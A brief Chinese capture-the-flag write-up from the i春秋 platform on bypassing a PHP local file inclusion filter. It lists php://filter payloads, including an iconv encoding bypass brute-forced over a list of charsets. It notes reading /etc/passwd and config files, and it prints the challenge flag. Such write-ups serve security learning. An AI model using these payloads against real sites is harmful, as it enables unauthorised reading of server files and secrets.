i春秋-文件包含绕过(PHP伪协议的使用)
练习平台地址
竞赛中心
题目描述
题目内容
本地包含,进行BP爆破
成功获得了数据库敏感文件(配置文件和/etc/passwd)
但是发现/etc/shadow文件无法访问,那么无法登录数据库
尝试使用PHP伪协议读取文件
php://filter/resource=flag.php
php://filter/read=convert.base64-encode/resource=flag.php
php://filter/convert.iconv.utf8.utf8/resource=flag.php
测试第一个payload没有反应
测试第二个payload提示do not hack!说明方向正确
测试第三个payload又无回显了
尝试用BP对第三种方法交叉爆破
常见的编码方式
UCS-4*
UCS-4BE
UCS-4LE*
UCS-2
UCS-2BE
UCS-2LE
UTF-32*
UTF-32BE*
UTF-32LE*
UTF-16*
UTF-16BE*
UTF-16LE*
UTF-7
UTF7-IMAP
UTF-8*
ASCII*
交叉爆破
flag
flag{183773cd-d83f-4ddb-acbb-a30bcf61b287}
注意事项
文件包含可以使用PHP伪协议绕过